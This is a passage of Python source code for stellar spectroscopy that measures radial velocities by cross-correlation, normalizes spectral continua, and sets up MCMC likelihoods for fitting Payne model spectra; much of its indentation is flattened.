indexed elements of x in the interval [-(n-2), (n-2)].
yerr : array, optional
Array of uncertainties in y. Must be the same shape as y.
    covariance : bool, optional
        If True, the sample cross covariance is computed instead of the
        cross correlation.  Default is False.
    double : bool, optional
        Not used; kept from the IDL interface.
    nomean : bool, optional
        If True, do not subtract the means from X and Y first.  Default is False.
Returns
-------
cross : array
The cross correlation or cross covariance.
cerror : array
The uncertainty in "cross". Only if "yerr" is input.
Example
-------
Define two n-element sample populations.
.. code-block:: python
x = [3.73, 3.67, 3.77, 3.83, 4.67, 5.87, 6.70, 6.97, 6.40, 5.57]
y = [2.31, 2.76, 3.02, 3.13, 3.72, 3.88, 3.97, 4.39, 4.34, 3.95]
Compute the cross correlation of X and Y for LAG = -5, 0, 1, 5, 6, 7
.. code-block:: python
lag = [-5, 0, 1, 5, 6, 7]
result = ccorrelate(x, y, lag)
The result should be:
.. code-block:: python
[-0.428246, 0.914755, 0.674547, -0.405140, -0.403100, -0.339685]
"""
# Compute the sample cross correlation or cross covariance of
# (Xt, Xt+l) and (Yt, Yt+l) as a function of the lag (l).
xshape = x.shape
yshape = y.shape
nx = xshape[0]
if x.ndim==1:
nxorder = 1
else:
nxorder = xshape[1]
ny = yshape[0]
if y.ndim==1:
nyorder = 1
else:
nyorder = yshape[1]
npix = nx
norder = np.maximum(nxorder,nyorder)
# Check the inputs
if (nx != len(y)):
raise ValueError("X and Y arrays must have the same number of pixels in 1st dimension.")
if (x.ndim>2) | (y.ndim>2):
raise ValueError("X and Y must be 1D or 2D.")
if (x.ndim==2) & (y.ndim==1):
raise ValueError("If X is 2D then Y must be as well.")
# If X and Y are 2D then their Norders must be the same
if (x.ndim==2) & (y.ndim==2) & (nxorder!=nyorder):
raise ValueError("If X and Y are 2D then their length in the 2nd dimension must be the same.")
# Check that Y and Yerr have the same length
if yerr is not None:
if (y.shape != yerr.shape):
raise ValueError("Y and Yerr must have the same shape.")
if (nx<2):
raise ValueError("X and Y arrays must contain 2 or more elements.")
# Reshape arrays to [Npix,Norder], even if both are 1D
xd = x.copy()
yd = y.copy()
if yerr is not None: yderr=yerr.copy()
if (norder>1):
if (x.ndim==1):
# make multiple copies of X
xd = yd.copy()*0.0
for i in range(norder):
xd[:,i] = x.copy()
else:
xd = xd.reshape(npix,1)
yd = yd.reshape(npix,1)
if yerr is not None:
yderr = yderr.reshape(npix,1)
# Remove the means
if nomean is False:
for i in range(norder):
xd[:,i] -= np.nanmean(xd[:,i])
yd[:,i] -= np.nanmean(yd[:,i])
# Set NaNs or Infs to 0.0, mask bad pixels
fx = np.isfinite(xd)
ngdx = np.sum(fx)
nbdx = np.sum((fx==False))
if nbdx>0: xd[(fx==False)]=0.0
fy = np.isfinite(yd)
if yerr is not None:
fy &= (yderr<1e20) # mask out high errors as well
ngdy = np.sum(fy)
nbdy = np.sum((fy==False))
if nbdy>0:
yd[(fy==False)]=0.0
if yerr is not None: yderr[(fy==False)]=0.0
nlag = len(lag)
# MULTI-ORDER with ONE template and ONE spectrum to cross-correlate
###################################################################
# This is 2.3x faster than the original method down below
# for (4936, 3) spectra and nlag=765
if (norder>1) & (nxorder == nyorder):
# Initialize the output arrays
cross = np.zeros(nlag,dtype=float)
cross_error = np.zeros(nlag,dtype=float)
num = np.zeros(nlag,dtype=int) # number of "good" points at this lag
# flatten multi-order to 1D with buffer
buff = np.max(np.abs(lag))
xd1 = np.zeros(nx*norder + (norder-1)*buff,float)
yd1 = np.zeros(nx*norder + (norder-1)*buff,float)
yderr1 = np.zeros(nx*norder + (norder-1)*buff,float)
fx1 = np.zeros(nx*norder + (norder-1)*buff,bool)
fy1 = np.zeros(nx*norder + (norder-1)*buff,bool)
for i in range(norder):
lo = i*(nx+buff)
hi = lo+nx
xd1[lo:hi] = xd[:,i]
yd1[lo:hi] = yd[:,i]
            if yerr is not None:
                yderr1[lo:hi] = yderr[:,i]
fx1[lo:hi] = fx[:,i]
fy1[lo:hi] = fy[:,i]
nx1 = len(xd1)
# Loop over lag points
for k in range(nlag):
# Note the reversal of the variables for negative lags.
if lag[k]>0:
cross[k] = np.sum(xd1[0:nx1-lag[k]] * yd1[lag[k]:])
num[k] = np.sum(fx1[0:nx1-lag[k]] * fy1[lag[k]:])
if yerr is not None:
cross_error[k] = np.sum( (xd1[0:nx1-lag[k]] * yderr1[lag[k]:])**2 )
else:
cross[k] = np.sum(yd1[0:nx1+lag[k]] * xd1[-lag[k]:])
num[k] = np.sum(fy1[0:nx1+lag[k]] * fx1[-lag[k]:])
if yerr is not None:
cross_error[k] = np.sum( (yderr1[0:nx1+lag[k]] * xd1[-lag[k]:])**2 )
rmsx = np.sqrt(np.sum((xd*fx)**2))
if rmsx==0.0: rmsx=1.0
rmsy = np.sqrt(np.sum((yd*fy)**2))
if rmsy==0.0: rmsy=1.0
# Normalize by number of "good" points
cross *= np.max(num)
pnum = (num>0)
cross[pnum] /= num[pnum] # normalize by number of "good" points
# Take sqrt to finish adding errors in quadrature
cross_error = np.sqrt(cross_error)
# normalize
cross_error *= np.max(num)
cross_error[pnum] /= num[pnum]
# Divide by N for covariance, or divide by variance for correlation.
nelements = npix*norder
if covariance is True:
cross /= nelements
cross_error /= nelements
else:
cross /= rmsx*rmsy
cross_error /= rmsx*rmsy
    # SINGLE-ORDER OR ONE template with MULTIPLE spectra to cross-correlate
#######################################################################
else:
# Initialize the output arrays
cross = np.zeros((nlag,norder),dtype=float)
cross_error = np.zeros((nlag,norder),dtype=float)
num = np.zeros((nlag,norder),dtype=int) # number of "good" points at this lag
rmsx = np.zeros(norder,dtype=float)
rmsy = np.zeros(norder,dtype=float)
# Loop over orders
for i in range(norder):
# Loop over lag points
for k in range(nlag):
# Note the reversal of the variables for negative lags.
if lag[k]>0:
cross[k,i] = np.sum(xd[0:nx-lag[k],i] * yd[lag[k]:,i])
num[k,i] = np.sum(fx[0:nx-lag[k],i] * fy[lag[k]:,i])
if yerr is not None:
cross_error[k,i] = np.sum( (xd[0:nx-lag[k],i] * yderr[lag[k]:,i])**2 )
else:
cross[k,i] = np.sum(yd[0:nx+lag[k],i] * xd[-lag[k]:,i])
num[k,i] = np.sum(fy[0:nx+lag[k],i] * fx[-lag[k]:,i])
if yerr is not None:
cross_error[k,i] = np.sum( (yderr[0:nx+lag[k],i] * xd[-lag[k]:,i])**2 )
if (npix>2):
rmsx[i] = np.sum(xd[fx[:,i],i]**2)
if (rmsx[i]==0): rmsx[i]=1.0
rmsy[i] = np.sum(yd[fy[:,i],i]**2)
if (rmsy[i]==0): rmsy[i]=1.0
else:
rmsx[i] = 1.0
rmsy[i] = 1.0
# Both X and Y are 2D, sum data from multiple orders
if (nxorder>1) & (nyorder>1):
cross = np.sum(cross,axis=1).reshape(nlag,1)
cross_error= np.sum(cross_error,axis=1).reshape(nlag,1)
num = np.sum(num,axis=1).reshape(nlag,1)
rmsx = np.sqrt(np.sum(rmsx,axis=0)).reshape(1)
rmsy = np.sqrt(np.sum(rmsy,axis=0)).reshape(1)
norder = 1
nelements = npix*norder
else:
rmsx = np.sqrt(rmsx)
rmsy = np.sqrt(rmsy)
nelements = npix
# Normalizations
for i in range(norder):
# Normalize by number of "good" points
cross[:,i] *= np.max(num[:,i])
pnum = (num[:,i]>0)
cross[pnum,i] /= num[pnum,i] # normalize by number of "good" points
# Take sqrt to finish adding errors in quadrature
cross_error[:,i] = np.sqrt(cross_error[:,i])
# normalize
cross_error[:,i] *= np.max(num[:,i])
cross_error[pnum,i] /= num[pnum,i]
# Divide by N for covariance, or divide by variance for correlation.
if covariance is True:
cross[:,i] /= nelements
cross_error[:,i] /= nelements
else:
cross[:,i] /= rmsx[i]*rmsy[i]
cross_error[:,i] /= rmsx[i]*rmsy[i]
# Flatten to 1D if norder=1
if norder==1:
cross = cross.flatten()
cross_error = cross_error.flatten()
if yerr is not None: return cross, cross_error
return cross
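# Illustrative use of ccorrelate with uncertainties (a sketch; x, y and yerr are
# hypothetical 1D arrays of the same length):
#   lag = np.arange(-10, 11)
#   ccf, ccferr = ccorrelate(x, y, lag, yerr=yerr)
#   bestlag = lag[np.argmax(ccf)]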
def specxcorr(wave=None,tempspec=None,obsspec=None,obserr=None,maxlag=200,errccf=False,prior=None):
"""This measures the radial velocity of a spectrum vs. a template using cross-correlation.
This program measures the cross-correlation shift between
a template spectrum (can be synthetic or observed) and
an observed spectrum (or multiple spectra) on the same
logarithmic wavelength scale.
Parameters
----------
wave : array
The wavelength array.
    tempspec : array
The template spectrum: normalized and on log-lambda scale.
obsspec : array
The observed spectra: normalized and sampled on tempspec scale.
obserr : array
The observed error; normalized and sampled on tempspec scale.
maxlag : int
The maximum lag or shift to explore.
prior : array, optional
Set a Gaussian prior on the cross-correlation. The first
term is the central position (in pixel shift) and the
second term is the Gaussian sigma (in pixels).
Returns
-------
outstr : numpy structured array
The output structure of the final derived RVs and errors.
auto : array
The auto-correlation function of the template
Examples
--------
.. code-block:: python
        out = specxcorr(wave,tempspec,spec,err)
"""
# Not enough inputs
if (wave is None) | (tempspec is None) | (obsspec is None) | (obserr is None):
        raise ValueError('Syntax - out = specxcorr(wave,tempspec,obsspec,obserr)')
nwave = len(wave)
# Are there multiple observed spectra
if obsspec.ndim>1:
nspec = obsspec.shape[1]
else:
nspec = 1
# Set up the cross-correlation parameters
# this only gives +/-450 km/s with 2048 pixels, maybe use larger range
    nlag = int(2*np.round(np.abs(maxlag))+1)
if ((nlag % 2) == 0): nlag +=1 # make sure nlag is odd
dlag = 1
    minlag = -int(np.ceil(nlag/2))
lag = np.arange(nlag)*dlag+minlag+1
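    # Worked example of the lag grid (illustrative numbers): with maxlag=200 this gives
    # nlag = 2*200+1 = 401, minlag = -201, and lag runs from -200 to +200 in steps of dlag=1.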
# Initialize the output structure
outstr = np.zeros(1,dtype=xcorr_dtype(nlag))
outstr["xshift"] = np.nan
outstr["xshifterr"] = np.nan
outstr["vrel"] = np.nan
outstr["vrelerr"] = np.nan
outstr["chisq"] = np.nan
wobs = wave.copy()
nw = len(wobs)
spec = obsspec.copy()
err = obserr.copy()
template = tempspec.copy()
# mask bad pixels, set to NAN
sfix = (spec < 0.01)
nsfix = np.sum(sfix)
if nsfix>0: spec[sfix] = np.nan
tfix = (template < 0.01)
ntfix = np.sum(tfix)
if ntfix>0: template[tfix] = np.nan
    # set cross-correlation window to be good range + nlag
#lo = (0 if (gd[0]-nlag)<0 else gd[0]-nlag)
#hi = ((nw-1) if (gd[ngd-1]+nlag)>(nw-1) else gd[ngd-1]+nlag)
nindobs = np.sum(np.isfinite(spec) == True) # only finite values, in case any NAN
nindtemp = np.sum(np.isfinite(template) == True) # only finite values, in case any NAN
if (nindobs>0) & (nindtemp>0):
# Cross-Correlation
#------------------
# Calculate the CCF uncertainties using propagation of errors
# Make median filtered error array
# high error values give crazy values in ccferr
obserr1 = err.copy()
if err.ndim==1:
bderr = ((obserr1 > 1) | (obserr1 <= 0.0))
nbderr = np.sum(bderr)
ngderr = np.sum((bderr==False))
if (nbderr > 0) & (ngderr > 1): obserr1[bderr]=np.median([obserr1[(bderr==False)]])
obserr1 = median_filter(obserr1,51)
if err.ndim==2:
for i in range(obserr1.shape[1]):
oerr1 = obserr1[:,i]
bderr = ((oerr1 > 1) | (oerr1 <= 0.0))
nbderr = np.sum(bderr)
ngderr = np.sum((bderr==False))
if (nbderr > 0) & (ngderr > 1): oerr1[bderr]=np.median([oerr1[(bderr==False)]])
oerr1 = median_filter(oerr1,51)
obserr1[:,i] = oerr1
# Run the cross-correlation
ccf, ccferr = ccorrelate(template,spec,lag,obserr1)
# Apply flat-topped Gaussian prior with unit amplitude
# add a broader Gaussian underneath so the rest of the
# CCF isn't completely lost
if prior is not None:
ccf *= np.exp(-0.5*(((lag-prior[0])/prior[1])**4))*0.8+np.exp(-0.5*(((lag-prior[0])/150)**2))*0.2
else: # no good pixels
        ccf = np.zeros(len(lag),float)
        ccferr = np.zeros(len(lag),float)
# Remove the median
ccf -= np.median(ccf)
# Best shift
best_shiftind0 = np.argmax(ccf)
best_xshift0 = lag[best_shiftind0]
#temp = shift( tout, best_xshift0)
temp = np.roll(template, best_xshift0, axis=0)
# Find Chisq for each synthetic spectrum
gdmask = (np.isfinite(spec)==True) & (np.isfinite(temp)==True) & (spec>0.0) & (err>0.0) & (err < 1e5)
ngdpix = np.sum(gdmask)
if (ngdpix==0):
raise Exception('Bad spectrum')
chisq = np.sqrt( np.sum( (spec[gdmask]-temp[gdmask])**2/err[gdmask]**2 )/ngdpix )
outstr["chisq"] = chisq
outstr["ccf"] = ccf
outstr["ccferr"] = ccferr
outstr["ccnlag"] = nlag
outstr["cclag"] = lag
# Remove smooth background at large scales
cont = gaussian_filter1d(ccf,100)
ccf_diff = ccf-cont
# Get peak of CCF
best_shiftind = np.argmax(ccf_diff)
best_xshift = lag[best_shiftind]
# Fit ccf peak with a Gaussian plus a line
#---------------------------------------------
    # Some CCF peaks are so wide that they span the whole lag range
# do the first one without background subtraction
estimates0 = [ccf_diff[best_shiftind0], best_xshift0, 4.0, 0.0]
lbounds0 = [1e-3, np.min(lag), 0.1, -np.inf]
ubounds0 = [np.inf, np.max(lag), np.max(lag), np.inf]
pars0, cov0 = dln.gaussfit(lag,ccf_diff,estimates0,ccferr,bounds=(lbounds0,ubounds0))
perror0 = np.sqrt(np.diag(cov0))
# Fit the width
# keep height, center and constant constrained
estimates1 = pars0
estimates1[1] = best_xshift
lbounds1 = [0.5*estimates1[0], best_xshift-4, 0.3*estimates1[2], dln.lt(np.min(ccf_diff),dln.lt(0,estimates1[3]-0.1)) ]
ubounds1 = [1.5*estimates1[0], best_xshift+4, 1.5*estimates1[2], dln.gt(np.max(ccf_diff)*0.5,estimates1[3]+0.1) ]
    lo1 = int(dln.gt(np.floor(best_shiftind-dln.gt(estimates1[2]*2,5)),0))
    hi1 = int(dln.lt(np.ceil(best_shiftind+dln.gt(estimates1[2]*2,5)),len(lag)))
pars1, cov1 = dln.gaussfit(lag[lo1:hi1],ccf_diff[lo1:hi1],estimates1,ccferr[lo1:hi1],bounds=(lbounds1,ubounds1))
yfit1 = dln.gaussian(lag[lo1:hi1],*pars1)
perror1 = np.sqrt(np.diag(cov1))
    # Refit and let the constant vary more, keep the width constrained
estimates2 = pars1
estimates2[1] = dln.limit(estimates2[1],np.min(lag),np.max(lag)) # must be in range
estimates2[3] = np.median(ccf_diff[lo1:hi1]-yfit1) + pars1[3]
lbounds2 = [0.5*estimates2[0], dln.limit(best_xshift-dln.gt(estimates2[2],1), np.min(lag), estimates2[1]-1),
0.3*estimates2[2], dln.lt(np.min(ccf_diff),dln.lt(0,estimates2[3]-0.1)) ]
ubounds2 = [1.5*estimates2[0], dln.limit(best_xshift+dln.gt(estimates2[2],1), estimates2[1]+1, np.max(lag)),
1.5*estimates2[2], dln.gt(np.max(ccf_diff)*0.5,estimates2[3]+0.1) ]
    lo2 = int(dln.gt(np.floor( best_shiftind-dln.gt(estimates2[2]*2,5)),0))
    hi2 = int(dln.lt(np.ceil( best_shiftind+dln.gt(estimates2[2]*2,5)),len(lag)))
pars2, cov2 = dln.gaussfit(lag[lo2:hi2],ccf_diff[lo2:hi2],estimates2,ccferr[lo2:hi2],bounds=(lbounds2,ubounds2))
yfit2 = dln.gaussian(lag[lo2:hi2],*pars2)
perror2 = np.sqrt(np.diag(cov2))
# Refit with even narrower range
estimates3 = pars2
estimates3[1] = dln.limit(estimates3[1],np.min(lag),np.max(lag)) # must be in range
estimates3[3] = np.median(ccf_diff[lo1:hi1]-yfit1) + pars1[3]
lbounds3 = [0.5*estimates3[0], dln.limit(best_xshift-dln.gt(estimates3[2],1), np.min(lag), estimates3[1]-1),
0.3*estimates3[2], dln.lt(np.min(ccf_diff),dln.lt(0,estimates3[3]-0.1)) ]
ubounds3 = [1.5*estimates3[0], dln.limit(best_xshift+dln.gt(estimates3[2],1), estimates3[1]+1, np.max(lag)),
1.5*estimates3[2], dln.gt(np.max(ccf_diff)*0.5,estimates3[3]+0.1) ]
    lo3 = int(dln.gt(np.floor(best_shiftind-dln.gt(estimates3[2]*2,5)),0))
    hi3 = int(dln.lt(np.ceil(best_shiftind+dln.gt(estimates3[2]*2,5)),len(lag)))
pars3, cov3 = dln.gaussfit(lag[lo3:hi3],ccf_diff[lo3:hi3],estimates3,ccferr[lo3:hi3],bounds=(lbounds3,ubounds3))
yfit3 = dln.gaussian(lag[lo3:hi3],*pars3)
perror3 = np.sqrt(np.diag(cov3))
# This seems to fix high shift/sigma errors
if (perror3[0]>10) | (perror3[1]>10):
dlbounds3 = [0.5*estimates3[0], -10+pars3[1], 0.01, dln.lt(np.min(ccf_diff),dln.lt(0,estimates3[3]-0.1)) ]
dubounds3 = [1.5*estimates3[0], 10+pars3[1], 2*pars3[2], dln.gt(np.max(ccf_diff)*0.5,estimates3[3]+0.1) ]
dpars3, dcov3 = dln.gaussfit(lag[lo3:hi3],ccf_diff[lo3:hi3],pars3,ccferr[lo3:hi3],bounds=(dlbounds3,dubounds3))
dyfit3 = dln.gaussian(lag[lo3:hi3],*pars3)
perror3 = np.sqrt(np.diag(dcov3))
# Final parameters
pars = pars3
perror = perror3
xshift = pars[1]
xshifterr = perror[1]
ccpfwhm_pix = pars[2]*2.35482 # ccp fwhm in pixels
# v = (10^(delta log(wave))-1)*c
dwlog = np.median(dln.slope(np.log10(wave)))
ccpfwhm = ( 10**(ccpfwhm_pix*dwlog)-1 )*cspeed # in km/s
# Convert pixel shift to velocity
#---------------------------------
# delta log(wave) = log(v/c+1)
# v = (10^(delta log(wave))-1)*c
dwlog = np.median(dln.slope(np.log10(wave)))
vrel = ( 10**(xshift*dwlog)-1 )*cspeed
# Vrel uncertainty
dvreldshift = np.log(10.0)*(10**(xshift*dwlog))*dwlog*cspeed # derivative wrt shift
vrelerr = dvreldshift * xshifterr
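    # Worked example (illustrative numbers only): for a log-lambda grid with
    # dwlog ~ 2.4e-6 dex/pixel, a shift of xshift = 10 pixels gives
    # vrel = (10**(10*2.4e-6)-1)*cspeed ~ 16.6 km/s, and for small shifts the
    # uncertainty scales linearly: vrelerr ~ ln(10)*dwlog*cspeed*xshifterr.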
# Make CCF structure and add to STR
#------------------------------------
outstr["xshift0"] = best_xshift
outstr["ccp0"] = np.max(ccf)
outstr["xshift"] = xshift
outstr["xshifterr"] = xshifterr
#outstr[i].xshift_interp = xshift_interp
outstr["ccpeak"] = pars[0]
outstr["ccpfwhm"] = ccpfwhm # in km/s
outstr["ccp_pars"] = pars
outstr["ccp_perror"] = perror
#outstr[i].ccp_polycoef = polycoef
outstr["vrel"] = vrel
outstr["vrelerr"] = vrelerr
outstr["w0"] = np.min(wave)
outstr["dw"] = dwlog
return outstr
def normspec(spec=None,ncorder=6,fixbadpix=True,noerrcorr=False,
binsize=0.05,perclevel=95.0,growsky=False,nsky=5):
"""
This program normalizes a spectrum.
Parameters
----------
spec : Spec1D object
A spectrum object. This at least needs
to have a FLUX and WAVE attribute.
ncorder : int, default=6
The continuum polynomial order. The default is 6.
noerrcorr : bool, default=False
Do not use a correction for the effects of the errors
on the continuum measurement. The default is to make
this correction if errors are included.
fixbadpix : bool, default=True
Set bad pixels to the continuum
binsize : float, default=0.05
The binsize to use (in units of 900A) for determining
the Nth percentile spectrum to fit with a polynomial.
perclevel : float, default=95
The Nth percentile to use to determine the continuum.
Returns
-------
nspec : array
The continuum normalized spectrum.
cont : array
The continuum array.
masked : array
A boolean array specifying if a pixel was masked (True) or not (False).
Examples
--------
.. code-block:: python
nspec,cont,masked = normspec(spec)
"""
# Not enough inputs
if spec is None:
raise ValueError("""spec2 = normspec(spec,fixbadpix=fixbadpix,ncorder=ncorder,noerrcorr=noerrcorr,
binsize=binsize,perclevel=perclevel)""")
musthave = ['flux','err','mask','wave']
for a in musthave:
if hasattr(spec,a) is False:
raise ValueError("spec object must have "+a)
# Can only do 1D or 2D arrays
if spec.flux.ndim>2:
raise Exception("Flux can only be 1D or 2D arrays")
# Do special processing if the input is 2D
# Loop over the shorter axis
if spec.flux.ndim==2:
nx, ny = spec.flux.shape
nspec = np.zeros(spec.flux.shape)
cont = np.zeros(spec.flux.shape)
masked = np.zeros(spec.flux.shape,bool)
if nx<ny:
for i in range(nx):
flux = spec.flux[i,:]
err = spec.err[i,:]
mask = spec.mask[i,:]
wave = spec.wave[i,:]
spec1 = Spec1D(flux)
spec1.err = err
spec1.mask = mask
spec1.wave = wave
nspec1, cont1, masked1 = normspec(spec1,fixbadpix=fixbadpix,ncorder=ncorder,noerrcorr=noerrcorr,
binsize=binsize,perclevel=perclevel)
nspec[i,:] = nspec1
cont[i,:] = cont1
masked[i,:] = masked1
else:
for i in range(ny):
flux = spec.flux[:,i]
err = spec.err[:,i]
mask = spec.mask[:,i]
wave = spec.wave[:,i]
spec1 = Spec1D(flux)
spec1.err = err
spec1.mask = mask
spec1.wave = wave
nspec1, cont1, masked1 = normspec(spec1,fixbadpix=fixbadpix,ncorder=ncorder,noerrcorr=noerrcorr,
binsize=binsize,perclevel=perclevel)
nspec[:,i] = nspec1
cont[:,i] = cont1
masked[:,i] = masked1
return (nspec,cont,masked)
# Continuum Normalize
#----------------------
w = spec.wave.copy()
x = (w-np.median(w))/(np.max(w*0.5)-np.min(w*0.5)) # -1 to +1
y = spec.flux.copy()
yerr = None
if hasattr(spec,'err') is True:
if spec.err is not None:
yerr = spec.err.copy()
# Get good pixels, and set bad pixels to NAN
#--------------------------------------------
gdmask = (y>0) # need positive fluxes
ytemp = y.copy()
# Exclude pixels with mask=bad
if hasattr(spec,'mask') is True:
if spec.mask is not None:
mask = spec.mask.copy()
gdmask = (mask == 0)
gdpix = (gdmask == 1)
ngdpix = np.sum(gdpix)
bdpix = (gdmask != 1)
nbdpix = np.sum(bdpix)
if nbdpix>0: ytemp[bdpix]=np.nan # set bad pixels to NAN for now
# First attempt at continuum
#----------------------------
# Bin the data points
xr = [np.nanmin(x),np.nanmax(x)]
bins = np.ceil((xr[1]-xr[0])/binsize)+1
ybin, bin_edges, binnumber = bindata.binned_statistic(x,ytemp,statistic='percentile',
percentile=perclevel,bins=bins,range=None)
xbin = bin_edges[0:-1]+0.5*binsize
gdbin = np.isfinite(ybin)
ngdbin = np.sum(gdbin)
if ngdbin<(ncorder+1):
raise Exception("Not enough good flux points to fit the continuum")
# Fit with robust polynomial
coef1 = dln.poly_fit(xbin[gdbin],ybin[gdbin],ncorder,robust=True)
cont1 = dln.poly(x,coef1)
# Subtract smoothed error from it to remove the effects
# of noise on the continuum measurement
if (yerr is not None) & (noerrcorr is False):
smyerr = dln.medfilt(yerr,151) # first median filter
smyerr = dln.gsmooth(smyerr,100) # Gaussian smoothing
coef_err = dln.poly_fit(x,smyerr,ncorder,robust=True) # fit with robust poly
#poly_err = dln.poly(x,coef_err)
#cont1 -= 2*dln.poly_err # is this right????
med_yerr = np.median(smyerr) # median error
cont1 -= 2*med_yerr
# Second iteration
#-----------------
# This helps remove some residual structure
ytemp2 = ytemp/cont1
ybin2, bin_edges2, binnumber2 = bindata.binned_statistic(x,ytemp2,statistic='percentile',
percentile=perclevel,bins=bins,range=None)
xbin2 = bin_edges2[0:-1]+0.5*binsize
gdbin2 = np.isfinite(ybin2)
ngdbin2 = np.sum(gdbin2)
if ngdbin2<(ncorder+1):
raise Exception("Not enough good flux points to fit the continuum")
# Fit with robust polynomial
coef2 = dln.poly_fit(xbin2[gdbin2],ybin2[gdbin2],ncorder,robust=True)
cont2 = dln.poly(x,coef2)
# Subtract smoothed error again
if (yerr is not None) & (noerrcorr is False):
cont2 -= med_yerr/cont1
# Final continuum
cont = cont1*cont2 # final continuum
# "Fix" bad pixels
    if (nbdpix>0) and (fixbadpix is True):
y[bdpix] = cont[bdpix]
# Create continuum normalized spectrum
nspec = spec.flux.copy()/cont
# Add "masked" array
masked = np.zeros(spec.flux.shape,bool)
if (fixbadpix is True) & (nbdpix>0):
masked[bdpix] = True
return (nspec,cont,masked)
def spec_resid(pars,wave,flux,err,models,spec):
"""
This helper function calculates the residuals between an observed spectrum and a Cannon model spectrum.
Parameters
----------
pars : array
Input parameters [teff, logg, feh, rv].
wave : array
Wavelength array for observed spectrum.
flux : array
Observed flux array.
err : array
Uncertainties in the observed flux.
models : list of Cannon models
List of Cannon models to use
spec : Spec1D
The observed spectrum. Needed to run cannon.model_spectrum().
Returns
-------
resid : array
Array of residuals between the observed flux array and the Cannon model spectrum.
Example
-------
.. code-block:: python
resid = spec_resid(pars,wave,flux,err,models,spec)
"""
#m = cannon.model_spectrum(models,spec,teff=pars[0],logg=pars[1],feh=pars[2],rv=pars[3])
m = models(teff=pars[0],logg=pars[1],feh=pars[2],rv=pars[3])
if m is None:
return np.repeat(1e30,len(flux))
resid = (flux-m.flux.flatten())/err
return resid
def printpars(pars,parerr=None,names=None,units=None):
"""
Print out the parameters/labels with optionally uncertainties and units.
One parameter per line of output.
Parameters
----------
pars : list or numpy array
List or array of parameter values to print out. The default is
TEFF, LOGG, FE_H and VREL.
parerr : list or numpy array, optional
List or array of parameter uncertainties to print out. No uncertainties
are printed by default.
names : list, optional
List of parameter names. The default is ['Teff','logg','[Fe/H]','Vrel'] if
4 parameters are input or ['Teff','logg','[Fe/H]','[alpha/Fe]','Vrel'] if
        5 parameters are input.
units : list, optional
List of parameter units.
Returns
-------
Parameter values are printed to the screen, one parameter per line.
Example
-------
.. code-block:: python
        printpars(pars,parerr,names,units)
"""
print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging
npars = len(pars)
if names is None:
if npars==3:
names = ['Teff','logg','[Fe/H]']
units = ['K','','']
if npars==4:
names = ['Teff','logg','[Fe/H]','Vrel']
units = ['K','','','km/s']
if npars==5:
names = ['Teff','logg','[Fe/H]','[alpha/Fe]','Vrel']
units = ['K','','','','km/s']
if units is None:
units = [' ' for l in pars]
for i in range(npars):
if parerr is None:
err = None
else:
err = parerr[i]
if err is not None:
print('%-6s = %8.2f +/- %6.3f %-5s' % (names[i],pars[i],err,units[i]))
else:
print('%-6s = %8.2f %-5s' % (names[i],pars[i],units[i]))
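# Illustrative call to printpars (hypothetical values):
#   printpars([4500.0, 2.5, -1.0, 35.2], [50.0, 0.1, 0.05, 0.5])
# prints one parameter per line, e.g.
#   Teff   =  4500.00 +/- 50.000 K
#   Vrel   =    35.20 +/-  0.500 km/s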
######################### PAYNE PROGRAMS ###########################
def emcee_lnlike_payne(theta, x, y, yerr, sp):
"""
This helper function calculates the log likelihood for fit_mcmc_payne().
Parameters
----------
theta : array
Input parameters [teff, logg, feh, rv].
x : array
Array of x-values for y. Not really used.
y : array
Observed flux array.
yerr : array
Uncertainties in the observed flux.
sp : PayneSpecFitter
Special class for fitting Payne models to data.
Returns
-------
lnlike : float
The log likelihood value.
"""
mflux = sp.model(x,*theta)
inv_sigma2 = 1.0/yerr**2
return -0.5*(np.sum((y-mflux)**2*inv_sigma2))
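# Note: this is the Gaussian log-likelihood up to an additive constant,
# i.e. lnlike = -0.5*chisq with chisq = sum(((y-mflux)/yerr)**2).
# Illustrative usage (sp is a prepared PayneSpecFitter and theta matches sp.fitparams):
#   lnl = emcee_lnlike_payne(theta, spec.wave.flatten(), spec.flux.flatten(), spec.err.flatten(), sp)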
def emcee_lnprior_payne(theta, sp):
"""
This helper function calculates the log prior for fit_mcmc_payne().
It's a flat/uniform prior across the stellar parameter space covered by the
Payne model.
Parameters
----------
theta : array
Input parameters [teff, logg, feh, rv, etc.].
sp : PayneSpecFitter
Special class for fitting Payne models to data.
Returns
-------
lnprior : float
The log prior value.
"""
lbounds,ubounds = sp.bounds
nfitparams = len(sp.fitparams)
inside = True
for i in range(nfitparams):
inside &= (theta[i]>=lbounds[i]) & (theta[i]<=ubounds[i])
if inside:
return 0.0
return -np.inf
def emcee_lnprob_payne(theta, x, y, yerr, sp):
"""
This helper function calculates the log probability for fit_mcmc_payne().
Parameters
----------
theta : array
Input parameters [teff, logg, feh, rv, etc.].
x : array
Array of x-values for y. Not really used.
y : array
Observed flux array.
yerr : array
Uncertainties in the observed flux.
sp : PayneSpecFitter
Special class for fitting Payne models to data.
Returns
-------
lnprob : float
The log probability value, which is the sum of the log prior and the
log likelihood.
"""
lp = emcee_lnprior_payne(theta,sp)
if not np.isfinite(lp):
return -np.inf
return lp + emcee_lnlike_payne(theta, x, y, yerr, sp)
def fit_xcorrgrid_payne(spec,model=None,samples=None,verbose=False,maxvel=1000.0):
"""
Fit spectrum using cross-correlation with models sampled in the parameter space.
Parameters
----------
spec : Spec1D object
The observed spectrum to match.
model : Payne model, optional
Payne model to use. The default is to load all of the Payne
models in the data/ directory and use those.
samples : numpy structured array, optional
Catalog of teff/logg/feh/alphafe parameters to use when sampling the parameter space.
verbose : bool, optional
Verbose output of the various steps. This is False by default.
maxvel : float, optional
The maximum velocity to probe in the cross-correlation. The default is 1000 km/s.
Returns
-------
out : numpy structured array
The output structured array of the final derived RVs, stellar parameters and errors.
bmodel : Spec1D object
The best-fitting Payne model spectrum (as Spec1D object).
Example
-------
.. code-block:: python
out, bmodel = fit_xcorrgrid_payne(spec)
"""
print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging
# Check that the samples input has the right columns
if samples is not None:
        for n in ['teff','logg','feh','alphafe']:
try:
dum = samples[n]
except:
raise ValueError(n+' not found in input SAMPLES')
# Step 1: Prepare the spectrum
#-----------------------------
# normalize and mask spectrum
if spec.normalized is False:
spec = utils.specprep(spec)
    # Step 2: Load and prepare the Payne models
#-------------------------------------------
if model is None:
model = payne.load_models()
# Prepare if necessary
if model.prepared is False: model.prepare(spec)
# Step 3: put on logarithmic wavelength grid
#-------------------------------------------
wavelog = utils.make_logwave_scale(spec.wave,vel=0.0) # get new wavelength solution
obs = spec.interp(wavelog)
